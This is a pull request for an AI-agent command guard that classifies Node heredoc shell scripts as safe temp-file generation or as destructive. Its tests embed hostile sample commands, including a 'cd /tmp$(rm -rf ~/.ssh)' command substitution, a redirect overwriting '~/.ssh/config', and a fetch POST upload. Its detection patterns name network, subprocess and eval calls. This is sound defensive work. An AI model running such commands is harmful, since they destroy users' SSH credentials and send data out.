### PR TITLE
fix(guard): classify safe node generation scripts

### DIFF
--- a/src/codex_plugin_scanner/guard/runtime/secret_file_requests.py
+++ b/src/codex_plugin_scanner/guard/runtime/secret_file_requests.py
@@ -163,7 +163,7 @@ _BROAD_CREDENTIAL_EXFILTRATION_SKIP_COMMANDS = frozenset({"cat", "curl", "echo",
 _SHELL_ASSIGNMENT_PATTERN = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=.*")
 _SHELL_NEWLINE_SEPARATOR = ";"
 _HEREDOC_PATTERN = re.compile(r"<<-?\s*(['\"]?)([^\s'\";|&<>]+)\1")
-_SAFE_INTERPRETER_SETUP_SEGMENT_PATTERN = r"(?:cd\b[^\n;&|<>]*)"
+_SAFE_INTERPRETER_SETUP_SEGMENT_PATTERN = r"(?:cd\b[^\n;&|<>$`]*)"
 _SINGLE_INTERPRETER_HEREDOC_PATTERN = re.compile(
     rf"^\s*(?:(?:{_SAFE_INTERPRETER_SETUP_SEGMENT_PATTERN})\s*&&\s*)*(?P<interpreter>perl|python|python3|ruby)\b(?P<args>[^\n;&|]*)<<-?\s*(?P<quote>['\"]?)(?P<tag>[^\s'\";|&<>]+)(?P=quote)\s*\n(?P<body>.*)\n(?P=tag)\s*$",
     re.IGNORECASE | re.DOTALL,
@@ -2634,6 +2634,9 @@ def _looks_destructive_shell_command(command_text: str) -> bool:
     normalized = command_text.strip()
     if not normalized:
         return False
+    for substitution_payload in _shell_command_substitution_payloads(normalized):
+        if _looks_destructive_shell_command(substitution_payload):
+            return True
     node_heredoc_script = _single_node_heredoc_script(normalized)
     if node_heredoc_script is not None:
         if _looks_like_safe_node_generated_file_heredoc(normalized, node_heredoc_script):

--- a/src/codex_plugin_scanner/guard/runtime/secret_file_requests.py
+++ b/src/codex_plugin_scanner/guard/runtime/secret_file_requests.py
@@ -163,7 +163,7 @@ _BROAD_CREDENTIAL_EXFILTRATION_SKIP_COMMANDS = frozenset({"cat", "curl", "echo",
 _SHELL_ASSIGNMENT_PATTERN = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=.*")
 _SHELL_NEWLINE_SEPARATOR = ";"
 _HEREDOC_PATTERN = re.compile(r"<<-?\s*(['\"]?)([^\s'\";|&<>]+)\1")
-_SAFE_INTERPRETER_SETUP_SEGMENT_PATTERN = r"(?:cd\b[^\n;&|]*)"
+_SAFE_INTERPRETER_SETUP_SEGMENT_PATTERN = r"(?:cd\b[^\n;&|<>]*)"
 _SINGLE_INTERPRETER_HEREDOC_PATTERN = re.compile(
     rf"^\s*(?:(?:{_SAFE_INTERPRETER_SETUP_SEGMENT_PATTERN})\s*&&\s*)*(?P<interpreter>perl|python|python3|ruby)\b(?P<args>[^\n;&|]*)<<-?\s*(?P<quote>['\"]?)(?P<tag>[^\s'\";|&<>]+)(?P=quote)\s*\n(?P<body>.*)\n(?P=tag)\s*$",
     re.IGNORECASE | re.DOTALL,
@@ -2917,12 +2917,13 @@ def _first_js_call_argument(script_text: str, index: int) -> str | None:
 
 def _node_string_assignments(script_text: str) -> dict[str, str]:
     assignments: dict[str, str] = {}
-    pattern = re.compile(r"\b(?:const|let|var)\s+([A-Za-z_$][A-Za-z0-9_$]*)\s*=\s*(['\"`])((?:\\.|(?!\2).)*)\2")
     for _ in range(3):
         changed = False
-        for match in pattern.finditer(script_text):
-            name = match.group(1)
-            raw_value = match.group(3)
+        for line in script_text.splitlines():
+            assignment = _node_string_assignment_from_line(line)
+            if assignment is None:
+                continue
+            name, raw_value = assignment
             expanded_value = _node_expand_template_value(raw_value, assignments)
             if assignments.get(name) != expanded_value:
                 assignments[name] = expanded_value
@@ -2930,6 +2931,56 @@ def _node_string_assignments(script_text: str) -> dict[str, str]:
         if not changed:
             break
     return assignments
+
+
+def _node_string_assignment_from_line(line: str) -> tuple[str, str] | None:
+    stripped_line = line.strip().rstrip(";")
+    for prefix in ("const ", "let ", "var "):
+        if not stripped_line.startswith(prefix):
+            continue
+        rest = stripped_line[len(prefix) :].lstrip()
+        name_end = 0
+        while name_end < len(rest) and (rest[name_end].isalnum() or rest[name_end] in {"_", "$"}):
+            name_end += 1
+        if name_end == 0:
+            return None
+        name = rest[:name_end]
+        remainder = rest[name_end:].lstrip()
+        if not remainder.startswith("="):
+            return None
+        value = remainder[1:].lstrip()
+        if not value:
+            return None
+        quote = value[0]
+        if quote not in {"'", '"', "`"}:
+            return None
+        literal = _read_js_quoted_literal(value, quote)
+        if literal is None:
+            return None
+        return name, literal
+    return None
+
+
+def _read_js_quoted_literal(value: str, quote: str) -> str | None:
+    result: list[str] = []
+    index = 1
+    escape_next = False
+    while index < len(value):
+        character = value[index]
+        if escape_next:
+            result.append(character)
+            escape_next = False
+            index += 1
+            continue
+        if character == "\\":
+            escape_next = True
+            index += 1
+            continue
+        if character == quote:
+            return "".join(result)
+        result.append(character)
+        index += 1
+    return None
 
 
 def _node_expand_template_value(value: str, assignments: dict[str, str]) -> str:
@@ -2967,20 +3018,73 @@ def _node_generated_path_has_safe_root(path_text: str) -> bool:
 
 
 def _node_generated_path_contains_shell_expansion(path_text: str) -> bool:
-    return (
-        "$(" in path_text
-        or "`" in path_text
-        or "$'" in path_text
-        or '$"' in path_text
-        or re.search(r"\$[A-Za-z_][A-Za-z0-9_]*", path_text) is not None
-        or re.search(r"[*?\[\]]", path_text) is not None
-    )
+    if "$(" in path_text or "`" in path_text or "$'" in path_text or '$"' in path_text:
+        return True
+    if not _node_template_placeholders_are_safe_filename_fragments(path_text):
+        return True
+    redacted_path = _node_path_without_template_placeholders(path_text)
+    if any(character in redacted_path for character in "*?[]"):
+        return True
+    index = 0
+    while index < len(redacted_path):
+        if redacted_path[index] == "$" and index + 1 < len(redacted_path):
+            next_character = redacted_path[index + 1]
+            if next_character.isalnum() or next_character == "_":
+                return True
+        index += 1
+    return False
 
 
 def _node_generated_path_has_safe_extension(path_text: str) -> bool:
-    without_templates = re.sub(r"\$\{[^}]*\}", "x", path_text)
+    without_templates = _node_path_without_template_placeholders(path_text)
     extension = os.path.splitext(without_templates)[1].lower()
     return extension in _SAFE_NODE_GENERATED_FILE_EXTENSIONS
+
+
+def _node_template_placeholders_are_safe_filename_fragments(path_text: str) -> bool:
+    index = 0
+    while index < len(path_text):
+        start = path_text.find("${", index)
+        if start == -1:
+            return True
+        end = path_text.find("}", start + 2)
+        if end == -1:
+            return False
+        placeholder = path_text[start + 2 : end].strip()
+        if not _node_template_placeholder_is_safe_filename_fragment(placeholder):
+            return False
+        index = end + 1
+    return True
+
+
+def _node_template_placeholder_is_safe_filename_fragment(placeholder: str) -> bool:
+    if not placeholder.startswith("String(") or ".padStart(" not in placeholder:
+        return False
+    lowered = placeholder.lower()
+    if any(token in lowered for token in ("process", "require", "env", "import", "fs", "path", "child")):
+        return False
+    numeric_prefix, _separator, padding_suffix = placeholder.partition(".padStart(")
+    if any(character in numeric_prefix for character in ("'", '"', "\\", "`", "[", "]")):
+        return False
+    return not any(character in padding_suffix for character in ("/", "\\", "`", "[", "]"))
+
+
+def _node_path_without_template_placeholders(path_text: str) -> str:
+    result: list[str] = []
+    index = 0
+    while index < len(path_text):
+        start = path_text.find("${", index)
+        if start == -1:
+            result.append(path_text[index:])
+            break
+        result.append(path_text[index:start])
+        end = path_text.find("}", start + 2)
+        if end == -1:
+            result.append(path_text[start:])
+            break
+        result.append("x")
+        index = end + 1
+    return "".join(result)
 
 
 def _is_combined_node_inline_eval_flag(token: str) -> bool:

--- a/src/codex_plugin_scanner/guard/runtime/secret_file_requests.py
+++ b/src/codex_plugin_scanner/guard/runtime/secret_file_requests.py
@@ -168,6 +168,10 @@ _SINGLE_INTERPRETER_HEREDOC_PATTERN = re.compile(
     rf"^\s*(?:(?:{_SAFE_INTERPRETER_SETUP_SEGMENT_PATTERN})\s*&&\s*)*(?P<interpreter>perl|python|python3|ruby)\b(?P<args>[^\n;&|]*)<<-?\s*(?P<quote>['\"]?)(?P<tag>[^\s'\";|&<>]+)(?P=quote)\s*\n(?P<body>.*)\n(?P=tag)\s*$",
     re.IGNORECASE | re.DOTALL,
 )
+_SINGLE_NODE_HEREDOC_PATTERN = re.compile(
+    rf"^\s*(?:(?:{_SAFE_INTERPRETER_SETUP_SEGMENT_PATTERN})\s*&&\s*)*node\b(?P<args>[^\n;&|]*)<<-?\s*(?P<quote>['\"]?)(?P<tag>[^\s'\";|&<>]+)(?P=quote)\s*\n(?P<body>.*)\n(?P=tag)\s*$",
+    re.IGNORECASE | re.DOTALL,
+)
 _DESTRUCTIVE_NODE_INLINE_CALLS = frozenset(
     {
         "appendFile",
@@ -192,6 +196,8 @@ _DESTRUCTIVE_NODE_INLINE_CALLS = frozenset(
         "writeFileSync",
     }
 )
+_SAFE_NODE_GENERATED_FILE_EXTENSIONS = frozenset({".csv", ".json", ".jsonl", ".md", ".txt"})
+_SAFE_NODE_GENERATED_FILE_ROOTS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/")
 _DESTRUCTIVE_GIT_SUBCOMMANDS = frozenset({"clean", "reset", "restore", "rm"})
 _READ_ONLY_INTERPRETER_MUTATION_PATTERNS: tuple[re.Pattern[str], ...] = (
     re.compile(r"\bwrite_(?:text|bytes)\s*\(", re.IGNORECASE),
@@ -2628,6 +2634,11 @@ def _looks_destructive_shell_command(command_text: str) -> bool:
     normalized = command_text.strip()
     if not normalized:
         return False
+    node_heredoc_script = _single_node_heredoc_script(normalized)
+    if node_heredoc_script is not None:
+        if _looks_like_safe_node_generated_file_heredoc(normalized, node_heredoc_script):
+            return False
+        return _node_script_contains_sensitive_runtime_behavior(node_heredoc_script)
     if _looks_like_safe_graphql_query_file_workflow(normalized):
         return False
     parts = _split_shell_parts(normalized)
@@ -2811,6 +2822,165 @@ def _contains_destructive_node_inline_script(script: str) -> bool:
             if re.search(rf"{base_pattern}\s*(?:\?\s*)?\.\s*apply\s*\(", member_scan_script):
                 return True
     return False
+
+
+def _single_node_heredoc_script(command_text: str) -> str | None:
+    match = _SINGLE_NODE_HEREDOC_PATTERN.fullmatch(command_text.strip())
+    if match is None:
+        return None
+    args = match.group("args").strip()
+    if args not in {"", "-"}:
+        return None
+    script_text = match.group("body").strip()
+    return script_text or None
+
+
+def _looks_like_safe_node_generated_file_heredoc(command_text: str, script_text: str) -> bool:
+    if _single_node_heredoc_script(command_text) is None:
+        return False
+    if _node_script_contains_non_file_generation_risk(script_text):
+        return False
+    write_targets = _node_write_file_targets(script_text)
+    if not write_targets:
+        return False
+    assignments = _node_string_assignments(script_text)
+    return all(_node_write_target_is_safe_generated_file(target, assignments) for target in write_targets)
+
+
+def _node_script_contains_sensitive_runtime_behavior(script_text: str) -> bool:
+    return _contains_destructive_node_inline_script(script_text) or _node_script_contains_non_file_generation_risk(
+        script_text
+    )
+
+
+def _node_script_contains_non_file_generation_risk(script_text: str) -> bool:
+    lowered = script_text.lower()
+    if _path_text_looks_sensitive(script_text):
+        return True
+    return bool(
+        re.search(r"\b(?:fetch|xmlhttprequest)\s*\(", lowered)
+        or re.search(r"\b(?:http|https|net|tls|dgram)\s*\.", lowered)
+        or re.search(r"\brequire\s*\(\s*['\"](?:child_process|http|https|net|tls|dgram)['\"]\s*\)", lowered)
+        or re.search(r"\b(?:exec|execfile|execfilesync|execsync|spawn|spawnsync|fork)\s*\(", lowered)
+        or re.search(r"\b(?:eval|function)\s*\(", lowered)
+    )
+
+
+def _node_write_file_targets(script_text: str) -> tuple[str, ...]:
+    targets: list[str] = []
+    for match in re.finditer(r"(?:^|[^A-Za-z0-9_$])(?:fs\s*\.\s*)?writeFile(?:Sync)?\s*\(", script_text):
+        target = _first_js_call_argument(script_text, match.end())
+        if target is not None:
+            targets.append(target)
+    return tuple(targets)
+
+
+def _first_js_call_argument(script_text: str, index: int) -> str | None:
+    argument_start = index
+    depth = 0
+    quote: str | None = None
+    escape_next = False
+    while index < len(script_text):
+        character = script_text[index]
+        if escape_next:
+            escape_next = False
+            index += 1
+            continue
+        if character == "\\":
+            escape_next = True
+            index += 1
+            continue
+        if quote is not None:
+            if character == quote:
+                quote = None
+            index += 1
+            continue
+        if character in {"'", '"', "`"}:
+            quote = character
+            index += 1
+            continue
+        if character in "([{":
+            depth += 1
+            index += 1
+            continue
+        if character in ")]}":
+            if depth == 0:
+                return script_text[argument_start:index].strip() or None
+            depth -= 1
+            index += 1
+            continue
+        if character == "," and depth == 0:
+            return script_text[argument_start:index].strip() or None
+        index += 1
+    return None
+
+
+def _node_string_assignments(script_text: str) -> dict[str, str]:
+    assignments: dict[str, str] = {}
+    pattern = re.compile(r"\b(?:const|let|var)\s+([A-Za-z_$][A-Za-z0-9_$]*)\s*=\s*(['\"`])((?:\\.|(?!\2).)*)\2")
+    for _ in range(3):
+        changed = False
+        for match in pattern.finditer(script_text):
+            name = match.group(1)
+            raw_value = match.group(3)
+            expanded_value = _node_expand_template_value(raw_value, assignments)
+            if assignments.get(name) != expanded_value:
+                assignments[name] = expanded_value
+                changed = True
+        if not changed:
+            break
+    return assignments
+
+
+def _node_expand_template_value(value: str, assignments: dict[str, str]) -> str:
+    expanded = value
+    for name, assigned_value in assignments.items():
+        expanded = expanded.replace("${" + name + "}", assigned_value)
+    return expanded
+
+
+def _node_write_target_is_safe_generated_file(target: str, assignments: dict[str, str]) -> bool:
+    normalized = target.strip()
+    if normalized in assignments:
+        normalized = assignments[normalized]
+    elif _js_string_literal_text(normalized) is not None:
+        normalized = _js_string_literal_text(normalized) or ""
+        normalized = _node_expand_template_value(normalized, assignments)
+    else:
+        return False
+    if _node_generated_path_contains_shell_expansion(normalized) or _path_text_looks_sensitive(normalized):
+        return False
+    if "../" in normalized or normalized.startswith("../"):
+        return False
+    return _node_generated_path_has_safe_root(normalized) and _node_generated_path_has_safe_extension(normalized)
+
+
+def _js_string_literal_text(value: str) -> str | None:
+    if len(value) < 2 or value[0] != value[-1] or value[0] not in {"'", '"', "`"}:
+        return None
+    return value[1:-1]
+
+
+def _node_generated_path_has_safe_root(path_text: str) -> bool:
+    lowered = path_text.lower()
+    return lowered.startswith(_SAFE_NODE_GENERATED_FILE_ROOTS)
+
+
+def _node_generated_path_contains_shell_expansion(path_text: str) -> bool:
+    return (
+        "$(" in path_text
+        or "`" in path_text
+        or "$'" in path_text
+        or '$"' in path_text
+        or re.search(r"\$[A-Za-z_][A-Za-z0-9_]*", path_text) is not None
+        or re.search(r"[*?\[\]]", path_text) is not None
+    )
+
+
+def _node_generated_path_has_safe_extension(path_text: str) -> bool:
+    without_templates = re.sub(r"\$\{[^}]*\}", "x", path_text)
+    extension = os.path.splitext(without_templates)[1].lower()
+    return extension in _SAFE_NODE_GENERATED_FILE_EXTENSIONS
 
 
 def _is_combined_node_inline_eval_flag(token: str) -> bool:

--- a/src/codex_plugin_scanner/guard/runtime/secret_file_requests.py
+++ b/src/codex_plugin_scanner/guard/runtime/secret_file_requests.py
@@ -2840,6 +2840,8 @@ def _looks_like_safe_node_generated_file_heredoc(command_text: str, script_text:
         return False
     if _node_script_contains_non_file_generation_risk(script_text):
         return False
+    if _node_script_contains_disallowed_destructive_file_call(script_text):
+        return False
     write_targets = _node_write_file_targets(script_text)
     if not write_targets:
         return False
@@ -2864,6 +2866,27 @@ def _node_script_contains_non_file_generation_risk(script_text: str) -> bool:
         or re.search(r"\b(?:exec|execfile|execfilesync|execsync|spawn|spawnsync|fork)\s*\(", lowered)
         or re.search(r"\b(?:eval|function)\s*\(", lowered)
     )
+
+
+def _node_script_contains_disallowed_destructive_file_call(script_text: str) -> bool:
+    allowed_write_calls = {"writeFile", "writeFileSync"}
+    redacted_script = _redacted_node_inline_string_literals(script_text)
+    member_scan_script = _redacted_node_inline_string_literals(script_text, preserve_bracket_member_strings=True)
+    for call_name in _DESTRUCTIVE_NODE_INLINE_CALLS - allowed_write_calls:
+        escaped_call_name = re.escape(call_name)
+        if re.search(rf"(?<![A-Za-z0-9_$'\"]){escaped_call_name}\s*(?:\?\.\s*)?\(", redacted_script):
+            return True
+        for base_pattern in (
+            rf"\.\s*{escaped_call_name}",
+            rf"\[\s*['\"]{escaped_call_name}['\"]\s*\]",
+        ):
+            if re.search(rf"{base_pattern}\s*(?:\?\.\s*)?(?:\)\s*)?\(", member_scan_script):
+                return True
+            if re.search(rf"{base_pattern}\s*(?:\?\s*)?\.\s*call\s*\(", member_scan_script):
+                return True
+            if re.search(rf"{base_pattern}\s*(?:\?\s*)?\.\s*apply\s*\(", member_scan_script):
+                return True
+    return False
 
 
 def _node_write_file_targets(script_text: str) -> tuple[str, ...]:

--- a/tests/test_guard_risk.py
+++ b/tests/test_guard_risk.py
@@ -8,6 +8,7 @@ from pathlib import Path
 import pytest
 
 from codex_plugin_scanner.cli import main
+from codex_plugin_scanner.guard.advisory_model import _normalized_url_indicator
 from codex_plugin_scanner.guard.approvals import queue_blocked_approvals
 from codex_plugin_scanner.guard.config import GuardConfig
 from codex_plugin_scanner.guard.consumer import artifact_hash, evaluate_detection
@@ -30,7 +31,6 @@ from codex_plugin_scanner.guard.risk import (
     detect_staged_download,
     extract_network_hosts,
 )
-from codex_plugin_scanner.guard.advisory_model import _normalized_url_indicator
 from codex_plugin_scanner.guard.runtime.actions import normalize_codex_hook_payload
 from codex_plugin_scanner.guard.runtime.secret_file_requests import (
     _path_text_is_within_root_text,
@@ -632,6 +632,62 @@ def test_tool_action_request_classifier_skips_git_commit_with_coauthored_by_trai
     )
 
     assert request is None
+
+
+def test_tool_action_request_classifier_skips_node_heredoc_generated_temp_json_workflow():
+    request = extract_sensitive_tool_action_request(
+        "bash",
+        {
+            "command": """node - <<'NODE'
+const fs = require('fs');
+const sourcePath = '/workspace/reports/input.csv';
+const outDir = '/tmp';
+const text = fs.readFileSync(sourcePath, 'utf8');
+const rows = text.split('\\n').filter(Boolean);
+function page(row) {
+  return { properties: { Firm: row } };
+}
+for (let i = 0; i < rows.length; i += 40) {
+  const file = `${outDir}/send-ready-${String(i / 40 + 1).padStart(2, '0')}.json`;
+  fs.writeFileSync(file, JSON.stringify({ pages: rows.slice(i, i + 40).map(page) }));
+  console.log(file, '->', rows.at(-1));
+}
+NODE"""
+        },
+    )
+
+    assert request is None
+
+
+def test_tool_action_request_classifier_detects_node_heredoc_delete_operation():
+    request = extract_sensitive_tool_action_request(
+        "bash",
+        {
+            "command": """node - <<'NODE'
+const fs = require('fs');
+fs.unlinkSync('dangerous-marker.json');
+NODE"""
+        },
+    )
+
+    assert request is not None
+    assert request.action_class == "destructive shell command"
+
+
+def test_tool_action_request_classifier_detects_node_heredoc_network_generation_flow():
+    request = extract_sensitive_tool_action_request(
+        "bash",
+        {
+            "command": """node - <<'NODE'
+const fs = require('fs');
+fs.writeFileSync('/tmp/send-ready.json', JSON.stringify({ ok: true }));
+fetch('https://example.invalid/upload', { method: 'POST' });
+NODE"""
+        },
+    )
+
+    assert request is not None
+    assert request.action_class == "destructive shell command"
 
 
 def test_tool_action_request_classifier_detects_python_inline_file_write():

--- a/tests/test_guard_risk.py
+++ b/tests/test_guard_risk.py
@@ -690,6 +690,36 @@ NODE"""
     assert request.action_class == "destructive shell command"
 
 
+def test_tool_action_request_classifier_detects_node_heredoc_setup_redirection():
+    request = extract_sensitive_tool_action_request(
+        "bash",
+        {
+            "command": """cd /tmp > ~/.ssh/config && node - <<'NODE'
+const fs = require('fs');
+fs.writeFileSync('/tmp/send-ready.json', JSON.stringify({ ok: true }));
+NODE"""
+        },
+    )
+
+    assert request is not None
+    assert request.action_class == "destructive shell command"
+
+
+def test_tool_action_request_classifier_detects_node_heredoc_dynamic_path_traversal_placeholder():
+    request = extract_sensitive_tool_action_request(
+        "bash",
+        {
+            "command": """node - <<'NODE'
+const fs = require('fs');
+fs.writeFileSync(`/tmp/${process.env.OUT}.json`, JSON.stringify({ ok: true }));
+NODE"""
+        },
+    )
+
+    assert request is not None
+    assert request.action_class == "destructive shell command"
+
+
 def test_tool_action_request_classifier_detects_python_inline_file_write():
     request = extract_sensitive_tool_action_request(
         "bash",

--- a/tests/test_guard_risk.py
+++ b/tests/test_guard_risk.py
@@ -721,6 +721,21 @@ NODE"""
     assert request.action_class == "destructive shell command"
 
 
+def test_tool_action_request_classifier_detects_node_heredoc_setup_command_substitution():
+    request = extract_sensitive_tool_action_request(
+        "bash",
+        {
+            "command": """cd /tmp$(rm -rf ~/.ssh) && node - <<'NODE'
+const fs = require('fs');
+fs.writeFileSync('/tmp/send-ready.json', JSON.stringify({ ok: true }));
+NODE"""
+        },
+    )
+
+    assert request is not None
+    assert request.action_class == "destructive shell command"
+
+
 def test_tool_action_request_classifier_detects_node_heredoc_dynamic_path_traversal_placeholder():
     request = extract_sensitive_tool_action_request(
         "bash",

--- a/tests/test_guard_risk.py
+++ b/tests/test_guard_risk.py
@@ -674,6 +674,22 @@ NODE"""
     assert request.action_class == "destructive shell command"
 
 
+def test_tool_action_request_classifier_detects_node_heredoc_safe_write_then_delete_operation():
+    request = extract_sensitive_tool_action_request(
+        "bash",
+        {
+            "command": """node - <<'NODE'
+const fs = require('fs');
+fs.writeFileSync('/tmp/send-ready.json', JSON.stringify({ ok: true }));
+fs.unlinkSync('dangerous-marker.json');
+NODE"""
+        },
+    )
+
+    assert request is not None
+    assert request.action_class == "destructive shell command"
+
+
 def test_tool_action_request_classifier_detects_node_heredoc_network_generation_flow():
     request = extract_sensitive_tool_action_request(
         "bash",


### PR DESCRIPTION
## Summary
- avoid treating single Node heredoc temp-file generation workflows as destructive shell syntax
- keep Node heredoc delete, network, subprocess, eval, and sensitive-path behavior blocked
- add regression coverage for the CSV-to-temp-JSON generation shape

## Verification
- pytest tests/test_guard_risk.py -k "node_heredoc or skips_node_heredoc or detects_node_heredoc or skips_read_only_shell_pipeline or skips_git_commit_with_coauthored"
- pytest tests/test_guard_risk.py tests/test_guard_runtime.py -k "destructive_shell_command or node_inline or node_heredoc or safe_graphql or safe_requests or skips_read_only_shell_pipeline or data_flow_exfiltration_path"
- ruff check src/codex_plugin_scanner/guard/runtime/secret_file_requests.py tests/test_guard_risk.py